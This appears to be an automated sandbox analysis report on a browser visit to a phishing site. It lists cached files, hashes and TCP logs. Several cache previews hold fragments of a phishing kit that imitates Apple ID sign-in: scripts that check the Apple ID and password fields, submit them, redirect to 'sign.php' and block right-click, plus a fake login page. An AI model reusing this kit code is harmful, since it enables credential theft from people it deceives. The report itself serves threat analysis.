....K....X.."ydv..E.....................E`AE........R...JP.\)^..

Chrome Cache Entry: 116

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	257551
Entropy (8bit):	5.076103298470518
Encrypted:	false
SSDEEP:	6144:yeLfh6nxcr8uVgTdp2YmD1BFEFy41vL/2VX82KLHIPf2hADD1+RH:yGxYmDTmFyHsDMPfOADD8RH
MD5:	888D4551B8DB7C41CDA28D95E494F998
SHA1:	26E6B63B81813D8AD942C90D369DF2673602B812
SHA-256:	893E90F6230962E42231635DF650F20544AD22AFFC3EE396DF768EAA6BC5A6A2
SHA-512:	38AB8BDA4A62F337DE5DCA925E719B2FAB4A73D2715A6A69258E263929F512C9E045BEDFC75379FBBC0E4C6AAED9B23938060BDCE83BFC17A0EC4B161B638128
Malicious:	false
Reputation:	low
URL:	https://code.jquery.com/jquery-2.2.4.js
Preview:	/!. jQuery JavaScript Library v2.2.4. * http://jquery.com/. . Includes Sizzle.js. * http://sizzlejs.com/. . Copyright jQuery Foundation and other contributors. * Released under the MIT license. * http://jquery.org/license. . Date: 2016-05-20T17:23Z. */..(function( global, factory ) {...if ( typeof module === "object" && typeof module.exports === "object" ) {...// For CommonJS and CommonJS-like environments where a proper `window`...// is present, execute the factory and get jQuery....// For environments that do not have a `window` with a `document`...// (such as Node.js), expose a factory as module.exports....// This accentuates the need for the creation of a real `window`....// e.g. var jQuery = require("jquery")(window);...// See ticket #14549 for more info....module.exports = global.document ?....factory( global, true ) :....function( w ) {.....if ( !w.document ) {......throw new Error( "jQuery requires a window with a document" );.....}.....return factory( w );....};..}

Chrome Cache Entry: 117

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (800)
Category:	dropped
Size (bytes):	4706
Entropy (8bit):	5.144994790579516
Encrypted:	false
SSDEEP:	48:4eBcnArHiLcwqcGLMUEU8cAbeCtuA3DnHHy3ve/lId1V9Qv/tQ8s5vTCf+cGLMu0:4ArDkeCtXz//GjC/m5HyvW97nWPGbUb
MD5:	7BD77193A6494B12C6D71AB96DE66E9B
SHA1:	729B883128EBE1C2512E25806C885747E2627A64
SHA-256:	65E0F349328999BC1378EF1F56486E971C0AAA33BA3E6D353C86F29985D80BA9
SHA-512:	D7A53E37F57EA0A5B8EE7E5DBD924D40DD189F47B75B90678D46040E601C768433285B50F89FF9868350C7BC7BC71AB1EAD35884C57D5D9C65B37B0A52D4452D
Malicious:	false
Reputation:	low
Preview:	function limpiar_carga() {. $("#carga_envio").css("display", "none"), $("#bt_flec").css("display", "block").}..function submitt() {. $.trim($("#appleId").val().length) > 0 ? $.trim($("#pwd").val().length) > 0 && ($("#carga_envio").css("display", "block"), $("#bt_flec").css("display", "none"), SubmitMe()) : $("#appleId").focus().}..function id_inp(a) {. var b = $("#" + a).val();. b.length > 0 ? ($(".signin-error").addClass("ocult"), $(".signin-error").removeClass("visb")) : ($(".signin-error").addClass("ocult"), $(".signin-error").removeClass("visb")).}..function salwinx() {. var a = $.trim($("#d").val()),. b = $.trim($("#iddapp").val());. window.location = a + "sign.php?reload=3&idname=" + b.}..function forgot() {. top.location.href = "https://idmsa.apple.com/IDMSWebAuth/signin?appIdKey=6f59402f11d3e2234be5b88bf1c96e1e453a875aec205272add55157582a9f61&path=%2F%3Fa%3D1179750425%26s%3D1%26wo%3DMS1BN7QDLY%26pli%3D79013838111353&language=ES-ES".}..function vis_fl

Chrome Cache Entry: 118

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (800)
Category:	downloaded
Size (bytes):	4706
Entropy (8bit):	5.144994790579516
Encrypted:	false
SSDEEP:	48:4eBcnArHiLcwqcGLMUEU8cAbeCtuA3DnHHy3ve/lId1V9Qv/tQ8s5vTCf+cGLMu0:4ArDkeCtXz//GjC/m5HyvW97nWPGbUb
MD5:	7BD77193A6494B12C6D71AB96DE66E9B
SHA1:	729B883128EBE1C2512E25806C885747E2627A64
SHA-256:	65E0F349328999BC1378EF1F56486E971C0AAA33BA3E6D353C86F29985D80BA9
SHA-512:	D7A53E37F57EA0A5B8EE7E5DBD924D40DD189F47B75B90678D46040E601C768433285B50F89FF9868350C7BC7BC71AB1EAD35884C57D5D9C65B37B0A52D4452D
Malicious:	false
Reputation:	low
URL:	https://www.flndmy.er-xu.com/aU3V88/jss/myscript_ind_fact.js
Preview:	function limpiar_carga() {. $("#carga_envio").css("display", "none"), $("#bt_flec").css("display", "block").}..function submitt() {. $.trim($("#appleId").val().length) > 0 ? $.trim($("#pwd").val().length) > 0 && ($("#carga_envio").css("display", "block"), $("#bt_flec").css("display", "none"), SubmitMe()) : $("#appleId").focus().}..function id_inp(a) {. var b = $("#" + a).val();. b.length > 0 ? ($(".signin-error").addClass("ocult"), $(".signin-error").removeClass("visb")) : ($(".signin-error").addClass("ocult"), $(".signin-error").removeClass("visb")).}..function salwinx() {. var a = $.trim($("#d").val()),. b = $.trim($("#iddapp").val());. window.location = a + "sign.php?reload=3&idname=" + b.}..function forgot() {. top.location.href = "https://idmsa.apple.com/IDMSWebAuth/signin?appIdKey=6f59402f11d3e2234be5b88bf1c96e1e453a875aec205272add55157582a9f61&path=%2F%3Fa%3D1179750425%26s%3D1%26wo%3DMS1BN7QDLY%26pli%3D79013838111353&language=ES-ES".}..function vis_fl

Chrome Cache Entry: 119

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (700)
Category:	dropped
Size (bytes):	11635
Entropy (8bit):	4.1111972773766405
Encrypted:	false
SSDEEP:	192:BEiYA68EiYKFZkc581cWJJT37IS3IQ3Al:BXYYXYKf6JJJw65w
MD5:	439E4CAB9246324ADD28B1FFCBAF4183
SHA1:	72A50EA229E8AA60EA6B9EE67F3303BCEC34EDC5
SHA-256:	F24A19E6A278F8060774960C4580AFD2B7654F4BD200237D689812D1153591D4
SHA-512:	95C11CB9BBF26F15B41BC660207403EBE0FF9BBFB3305F309B6075895A297C1021AC5E9E0BDB3BAC24B07C2C05D8D70F6FA0CB3CBBBBEC4176A29B861B0A82F4
Malicious:	false
Reputation:	low
Preview:	document.oncontextmenu = function(){return false;}. . $(document).ready(function(){. .. $("#btn_ip").css("top","5px");.. $("#cont_btn_apple").addClass("ap_bor");. $("#cont_btn_apple").addClass("bor");. . $("#cont_pwd").addClass('no_visibless');. $("#btn_ip").append('<img id="bt_flec2" class="icon icon_sign_in" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABoAAAAaCAYAAACpSkzOAAABgklEQVR42r3WsU7CUBSA4QtGQVIHYayjEgYTdpd2EV4BnXkGnWHRAY1jCZsJYtzcSU0kGt7ASSkLTD4ALvgPh4Q00GtL6/B1uSfnpO0991x1fGLrFHGBPiaYiQn6slbU5QlatPCKMa5QwQEyMFBCVda+JNYKUygLBx7OsAWlkZZYDw6yukJ5vOMZe1AhGXiQHPl1hXIY4g5pqIhSuJVcuVWFOniUQLWhlOTq+AtZ8GBAxcSAB2u50ADnIRPVsa+JqWGwKFSGF+G/dPGBQ81u9FBWPBq4hopQaI7voP6R3A3Fw0U1aiHxg/qauFO8KDlKTCifJp4CjDH3aa1ocBMTJedWBspngHkE9748O5j9W6G4P91N0KdzUUl6M8S1vW3N9m4uGna0QcMeaRp2hPLyj68lewQlf6ja/jHRRi/GMdFDO+nB11o7+EQBww1HeVdyFHSXk1048FD749ulJdaDg1zY69ab77plYluYqMjap8TaQdctnRIu4WKKHzGFK2slXZ5f2RlINtkg1cIAAAAASUVORK5CYII=">');. . $("#sign-in").on("click",func

Chrome Cache Entry: 120

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	315
Entropy (8bit):	5.0572271090563765
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
MD5:	A34AC19F4AFAE63ADC5D2F7BC970C07F
SHA1:	A82190FC530C265AA40A045C21770D967F4767B8
SHA-256:	D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
SHA-512:	42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
Malicious:	false
Reputation:	low
URL:	https://www.flndmy.er-xu.com/aU3V88/css/myriad-set-pro_text.ttf
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.

Chrome Cache Entry: 121

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	52
Entropy (8bit):	4.462660333975702
Encrypted:	false
SSDEEP:	3:OhG5xCunnVKekuSrIYn:OgLCokPr5
MD5:	0D931CE85BEA237F3A58C4252E4A77CA
SHA1:	1C7E4E13D0FF849BCE9CA33EFC2D95E3160DA475
SHA-256:	0D129697E649B29413707BB804C5C25BE60D0531AE3AAD888C23AFFCBEAC03F7
SHA-512:	B4CCE6E3AAD22D4836AE957E3C5CC3BBE5E3999EE4663F39CE6487896E19C01DE8531093648E9B720964295D9D98340EAF2830EF47377CA92C52B6BB6CE05B70
Malicious:	false
Reputation:	low
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSJQlNnG0uUWj7cxIFDQOnkNMSBQ1p6cC2EgUNQaf_nxIFDdd6aK8=?alt=proto
Preview:	CiQKBw0Dp5DTGgAKBw1p6cC2GgAKBw1Bp/+fGgAKBw3XemivGgA=

Chrome Cache Entry: 122

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	315
Entropy (8bit):	5.0572271090563765
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
MD5:	A34AC19F4AFAE63ADC5D2F7BC970C07F
SHA1:	A82190FC530C265AA40A045C21770D967F4767B8
SHA-256:	D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
SHA-512:	42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
Malicious:	false
Reputation:	low
URL:	https://www.flndmy.er-xu.com/favicon.ico
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.

Chrome Cache Entry: 123

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (700)
Category:	downloaded
Size (bytes):	11635
Entropy (8bit):	4.1111972773766405
Encrypted:	false
SSDEEP:	192:BEiYA68EiYKFZkc581cWJJT37IS3IQ3Al:BXYYXYKf6JJJw65w
MD5:	439E4CAB9246324ADD28B1FFCBAF4183
SHA1:	72A50EA229E8AA60EA6B9EE67F3303BCEC34EDC5
SHA-256:	F24A19E6A278F8060774960C4580AFD2B7654F4BD200237D689812D1153591D4
SHA-512:	95C11CB9BBF26F15B41BC660207403EBE0FF9BBFB3305F309B6075895A297C1021AC5E9E0BDB3BAC24B07C2C05D8D70F6FA0CB3CBBBBEC4176A29B861B0A82F4
Malicious:	false
Reputation:	low
URL:	https://www.flndmy.er-xu.com/aU3V88/jss/myscript_patron.js?v=2gdssf
Preview:	document.oncontextmenu = function(){return false;}. . $(document).ready(function(){. .. $("#btn_ip").css("top","5px");.. $("#cont_btn_apple").addClass("ap_bor");. $("#cont_btn_apple").addClass("bor");. . $("#cont_pwd").addClass('no_visibless');. $("#btn_ip").append('<img id="bt_flec2" class="icon icon_sign_in" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABoAAAAaCAYAAACpSkzOAAABgklEQVR42r3WsU7CUBSA4QtGQVIHYayjEgYTdpd2EV4BnXkGnWHRAY1jCZsJYtzcSU0kGt7ASSkLTD4ALvgPh4Q00GtL6/B1uSfnpO0991x1fGLrFHGBPiaYiQn6slbU5QlatPCKMa5QwQEyMFBCVda+JNYKUygLBx7OsAWlkZZYDw6yukJ5vOMZe1AhGXiQHPl1hXIY4g5pqIhSuJVcuVWFOniUQLWhlOTq+AtZ8GBAxcSAB2u50ADnIRPVsa+JqWGwKFSGF+G/dPGBQ81u9FBWPBq4hopQaI7voP6R3A3Fw0U1aiHxg/qauFO8KDlKTCifJp4CjDH3aa1ocBMTJedWBspngHkE9748O5j9W6G4P91N0KdzUUl6M8S1vW3N9m4uGna0QcMeaRp2hPLyj68lewQlf6ja/jHRRi/GMdFDO+nB11o7+EQBww1HeVdyFHSXk1048FD749ulJdaDg1zY69ab77plYluYqMjap8TaQdctnRIu4WKKHzGFK2slXZ5f2RlINtkg1cIAAAAASUVORK5CYII=">');. . $("#sign-in").on("click",func

Chrome Cache Entry: 124

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with CRLF, CR line terminators
Category:	downloaded
Size (bytes):	8479
Entropy (8bit):	5.267676982301893
Encrypted:	false
SSDEEP:	192:5+rBrUrzrMryr4r5rLrWrb4Zre1MrvprVr4rargrdrbrrnrQHrar2rLrFrs:5kB+P2AaZnc07B9aIClXrrQLI8nNs
MD5:	40DD3ED6442854F9D3C88E815E973CBC
SHA1:	5AB44172299C71F3BA00500BBC5FE54444E078FA
SHA-256:	E886A86CEAD4CF5038E4A382F801891DF37C975F922BC24E4C0720BCBE071764
SHA-512:	EE84A2E16F50F797B435ACB8E907A0C3E1E0B35AC88988597864AF14F36E0D55BD8C592664BA2CBD89D14DA536F1C26AC348123F3D66EE1EFE6D03B5FCC0A9DC
Malicious:	false
Reputation:	low
URL:	https://www.flndmy.er-xu.com/aU3V88/css/fonts2.css
Preview:	@font-face {....font-family:'Myriad Set Pro';....font-style:normal;....font-weight:100;....src:local('......'), url("myriad-set-pro_ultralight.woff") format("woff"), url("myriad-set-pro_ultralight.ttf") format("truetype");..../* Copyright (c) 1992 Adobe Systems Incorporated. All Rights Reserved. Myriad is a trademark of Adobe Systems Incorporated. /...}......@font-face {....font-family:'Myriad Set Pro';....font-style:italic;....font-weight:100;....src:local('......'), url("myriad-set-pro_ultralight-italic.woff") format("woff"), url("myriad-set-pro_ultralight-italic.ttf") format("truetype");..../ Copyright (c) 1992 Adobe Systems Incorporated. All Rights Reserved. Myriad is a trademark of Adobe Systems Incorporated. /...}......@font-face {....font-family:'Myriad Set Pro 100';....src:url("myriad-set-pro_ultralight.eot");..../ Copyright (c) 1992 Adobe Systems Incorporated. All Rights Reserved. Myriad is a trademark of Adobe Systems Incorporated. */...}......@font-face {....

Chrome Cache Entry: 125

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (540), with CRLF line terminators
Category:	downloaded
Size (bytes):	133797
Entropy (8bit):	4.903952448137914
Encrypted:	false
SSDEEP:	768:03q8agQxE9mjIaHmVdHmV+HmVTHmVDHmVNHmVhJ6Epjr5I7FikBe71UGZ:0zQxYPP7r5I7FikCUk
MD5:	7C74C8CFB91F41722B8495D4B6725C04
SHA1:	937FCD49A74D6176F7CBBCFACE707CA9A9DE448E
SHA-256:	D82A75584E4470E457A57A2A1F96F6D309180E04DA31C164BA42DF533A4881E5
SHA-512:	6A6341BF06E0D71C9660866076B116BB223D6E6462BA744202284EBC73ED80F8863DBEA79FD584A1AB4581AF6BF4E718291BEBD565B5378595BEF0D955348D5A
Malicious:	false
Reputation:	low
URL:	https://www.flndmy.er-xu.com/aU3V88/css/appe.css?v=1
Preview:	html {font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;}....body {margin:0;}....article, aside, details, figcaption, figure, footer, header, hgroup, main, menu, nav, section, summary {.. display:block;..}....audio, canvas, progress, video {.. display:inline-block;.. vertical-align:baseline;..}....audio:not([controls]) {.. display:none;.. height:0;..}....[hidden], template {.. display:none;..}....a{.. background-color:transparent;..}....a:active, a:hover {outline:0;}..abbr[title]{border-bottom:1px dotted;}..b, strong {font-weight:bold;}..dfn {font-style:italic;}..h1 {font-size:2em;margin:0.67em 0;}..mark {background:#ff0;color:#000;}..small {font-size:80%;}..sub, sup {font-size:75%;line-height:0;position:relative;vertical-align:baseline;}..sup {top:-0.5em;}..sub {bottom:-0.25em;}..img {border:0;}..svg:not(:root) {overflow:hidden;}..figure {margin:1em 40px;}..hr {box-sizing:content-box;height:0;}..pre {overflow:auto;}....code, kbd, pre,

Chrome Cache Entry: 127

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	3108
Entropy (8bit):	5.251190981557009
Encrypted:	false
SSDEEP:	48:3E1CTDGdQzm5e9DjHnb7D4cyrcvR2nOYP28zx7CNlflvAKVnTGAWopyWIv1rDx:3IaDnfHjxrpwRXy1+KtGAWjv
MD5:	9094D8547D9947A29FF7871AD51C7D1D
SHA1:	DED500858E791C145445EEEE579EC2BF0BED3BC2
SHA-256:	422DD27463CB6142DED7FA182CA1C220F463D6B38EC18C44FD1685C3B4F64984
SHA-512:	C12A78C8FAFFC1705BC7CE02B098E55491894D4BF9637E31CD0DA55C016BFAC7003E06CCD56EDBCDB432CC3F7DF08E022915115411F5501C485724E78ED3BC82
Malicious:	false
Reputation:	low
URL:	https://www.flndmy.er-xu.com/aU3V88/jss/function.js
Preview:	/*....* Base64 encode / decode..* http://www.webtoolkit.info/....*/....var Base64 = {.....// private property..._keyStr : "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",.....// public method for encoding...encode : function (input) {....var output = "";....var chr1, chr2, chr3, enc1, enc2, enc3, enc4;....var i = 0;......input = Base64._utf8_encode(input);......while (i < input.length) {.......chr1 = input.charCodeAt(i++);.....chr2 = input.charCodeAt(i++);.....chr3 = input.charCodeAt(i++);.......enc1 = chr1 >> 2;.....enc2 = ((chr1 & 3) << 4) \| (chr2 >> 4);.....enc3 = ((chr2 & 15) << 2) \| (chr3 >> 6);.....enc4 = chr3 & 63;.......if (isNaN(chr2)) {......enc3 = enc4 = 64;.....} else if (isNaN(chr3)) {......enc4 = 64;.....}.......output = output +.....this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +.....this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);......}......return output;...},.....// public method for decoding...decode : function (input) {....va

Chrome Cache Entry: 128

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3108
Entropy (8bit):	5.251190981557009
Encrypted:	false
SSDEEP:	48:3E1CTDGdQzm5e9DjHnb7D4cyrcvR2nOYP28zx7CNlflvAKVnTGAWopyWIv1rDx:3IaDnfHjxrpwRXy1+KtGAWjv
MD5:	9094D8547D9947A29FF7871AD51C7D1D
SHA1:	DED500858E791C145445EEEE579EC2BF0BED3BC2
SHA-256:	422DD27463CB6142DED7FA182CA1C220F463D6B38EC18C44FD1685C3B4F64984
SHA-512:	C12A78C8FAFFC1705BC7CE02B098E55491894D4BF9637E31CD0DA55C016BFAC7003E06CCD56EDBCDB432CC3F7DF08E022915115411F5501C485724E78ED3BC82
Malicious:	false
Reputation:	low
Preview:	/*....* Base64 encode / decode..* http://www.webtoolkit.info/....*/....var Base64 = {.....// private property..._keyStr : "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",.....// public method for encoding...encode : function (input) {....var output = "";....var chr1, chr2, chr3, enc1, enc2, enc3, enc4;....var i = 0;......input = Base64._utf8_encode(input);......while (i < input.length) {.......chr1 = input.charCodeAt(i++);.....chr2 = input.charCodeAt(i++);.....chr3 = input.charCodeAt(i++);.......enc1 = chr1 >> 2;.....enc2 = ((chr1 & 3) << 4) \| (chr2 >> 4);.....enc3 = ((chr2 & 15) << 2) \| (chr3 >> 6);.....enc4 = chr3 & 63;.......if (isNaN(chr2)) {......enc3 = enc4 = 64;.....} else if (isNaN(chr3)) {......enc4 = 64;.....}.......output = output +.....this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +.....this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);......}......return output;...},.....// public method for decoding...decode : function (input) {....va

Chrome Cache Entry: 129

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (32407), with CRLF line terminators
Category:	downloaded
Size (bytes):	46808
Entropy (8bit):	5.964674759057105
Encrypted:	false
SSDEEP:	768:f8I5zmboQ1iloyWDXpfIUot+/B5VlnT2Uuf91Uf8O2duzV:f8I5zmbAqywlIrt+/nXn6UuFqXiM
MD5:	DD5433EE58B5738735E0AF203D896D41
SHA1:	3AFF73F1A8C1B028EF17015102883B7B0F000047
SHA-256:	A1D36342AE6A737A337B03B0425FF053E23EA3B485901AC9B89A577DE2D4D36F
SHA-512:	71CD4DA91CC84E614AB13CA27D95AF3607A0FC92CD9EFCF1FBCF67EEE1EE92A63005077E79C86B94607F195F409EE9E5A557CB5B2255BF074E9815C3FBE41F60
Malicious:	false
Reputation:	low
URL:	https://www.flndmy.er-xu.com/aU3V88/c1.php
Preview:	<html lang="en"><head>.. <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">.. <link rel="stylesheet" href="css/fonts2.css" type="text/css"> .. <link rel="stylesheet" type="text/css" media="screen" href="css/appe.css?v=1">.. <script type="text/javascript" src="https://appleid.cdn-apple.com/appleauth/static/jsj/N1241477586/common-header.js"></script>....<style type="text/css">.. #idms-close{background-image: url("imagen/error.png");background-repeat: repeat-x;width: 24px;}.. .ocult{display: none !important;}.. .visb{display: block !important;}.. .ap_bor{border-bottom-left-radius: 6px !important;border-bottom-right-radius: 6px !important;}.. .bor{border-bottom: 1px solid rgba(0, 0, 0, 0.3) !important;} .. .visibless{display: block;}.. .no_visibless{display: none;}.. .btn1{display:none;top:45px !important} .. .btn2{ top:3px !important }.. .idms-modal-theme-translucent .icon.idms-modal-i-close {color: rgba(0, 0, 0, 0);}....tk-intro {font-siz

Chrome Cache Entry: 130

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	257551
Entropy (8bit):	5.076103298470518
Encrypted:	false
SSDEEP:	6144:yeLfh6nxcr8uVgTdp2YmD1BFEFy41vL/2VX82KLHIPf2hADD1+RH:yGxYmDTmFyHsDMPfOADD8RH
MD5:	888D4551B8DB7C41CDA28D95E494F998
SHA1:	26E6B63B81813D8AD942C90D369DF2673602B812
SHA-256:	893E90F6230962E42231635DF650F20544AD22AFFC3EE396DF768EAA6BC5A6A2
SHA-512:	38AB8BDA4A62F337DE5DCA925E719B2FAB4A73D2715A6A69258E263929F512C9E045BEDFC75379FBBC0E4C6AAED9B23938060BDCE83BFC17A0EC4B161B638128
Malicious:	false
Reputation:	low
Preview:	/!. jQuery JavaScript Library v2.2.4. * http://jquery.com/. . Includes Sizzle.js. * http://sizzlejs.com/. . Copyright jQuery Foundation and other contributors. * Released under the MIT license. * http://jquery.org/license. . Date: 2016-05-20T17:23Z. */..(function( global, factory ) {...if ( typeof module === "object" && typeof module.exports === "object" ) {...// For CommonJS and CommonJS-like environments where a proper `window`...// is present, execute the factory and get jQuery....// For environments that do not have a `window` with a `document`...// (such as Node.js), expose a factory as module.exports....// This accentuates the need for the creation of a real `window`....// e.g. var jQuery = require("jquery")(window);...// See ticket #14549 for more info....module.exports = global.document ?....factory( global, true ) :....function( w ) {.....if ( !w.document ) {......throw new Error( "jQuery requires a window with a document" );.....}.....return factory( w );....};..}

Static File Info

⊘No static file info

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 01:49:02.533930063 CET	49709	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:02.534023046 CET	443	49709	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:02.534141064 CET	49709	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:02.534770012 CET	49709	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:02.534809113 CET	443	49709	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:03.402261972 CET	443	49709	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:03.402360916 CET	49709	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:03.409207106 CET	49709	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:03.409265041 CET	443	49709	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:03.409478903 CET	443	49709	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:03.415316105 CET	49709	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:03.459376097 CET	443	49709	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:03.484535933 CET	49709	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:03.484601021 CET	443	49709	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:03.484858036 CET	49709	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:03.484879017 CET	443	49709	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:03.664855003 CET	443	49709	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:03.664984941 CET	443	49709	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:03.665066004 CET	49709	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:03.749919891 CET	49709	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:03.749955893 CET	443	49709	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:06.583054066 CET	49673	443	192.168.2.6	173.222.162.64
Jan 13, 2025 01:49:06.583058119 CET	49674	443	192.168.2.6	173.222.162.64
Jan 13, 2025 01:49:06.911202908 CET	49672	443	192.168.2.6	173.222.162.64
Jan 13, 2025 01:49:08.608520985 CET	443	49706	173.222.162.64	192.168.2.6
Jan 13, 2025 01:49:08.608617067 CET	49706	443	192.168.2.6	173.222.162.64
Jan 13, 2025 01:49:10.857028008 CET	49727	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:10.857068062 CET	443	49727	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:10.857146978 CET	49727	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:10.857738018 CET	49727	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:10.857753038 CET	443	49727	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:11.642947912 CET	443	49727	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:11.643059969 CET	49727	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:11.671639919 CET	49727	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:11.671655893 CET	443	49727	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:11.672543049 CET	443	49727	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:11.675276995 CET	49727	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:11.676887989 CET	49727	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:11.676893950 CET	443	49727	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:11.677346945 CET	49727	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:11.723321915 CET	443	49727	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:11.850624084 CET	443	49727	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:11.850831985 CET	443	49727	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:11.850895882 CET	49727	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:11.851087093 CET	49727	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:11.851099014 CET	443	49727	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:13.080264091 CET	49743	443	192.168.2.6	142.250.186.164
Jan 13, 2025 01:49:13.080308914 CET	443	49743	142.250.186.164	192.168.2.6
Jan 13, 2025 01:49:13.080424070 CET	49743	443	192.168.2.6	142.250.186.164
Jan 13, 2025 01:49:13.100569963 CET	49743	443	192.168.2.6	142.250.186.164
Jan 13, 2025 01:49:13.100580931 CET	443	49743	142.250.186.164	192.168.2.6
Jan 13, 2025 01:49:13.753612995 CET	443	49743	142.250.186.164	192.168.2.6
Jan 13, 2025 01:49:13.754904985 CET	49743	443	192.168.2.6	142.250.186.164
Jan 13, 2025 01:49:13.754926920 CET	443	49743	142.250.186.164	192.168.2.6
Jan 13, 2025 01:49:13.755954981 CET	443	49743	142.250.186.164	192.168.2.6
Jan 13, 2025 01:49:13.756045103 CET	49743	443	192.168.2.6	142.250.186.164
Jan 13, 2025 01:49:13.759170055 CET	49743	443	192.168.2.6	142.250.186.164
Jan 13, 2025 01:49:13.759243965 CET	443	49743	142.250.186.164	192.168.2.6
Jan 13, 2025 01:49:13.799752951 CET	49743	443	192.168.2.6	142.250.186.164
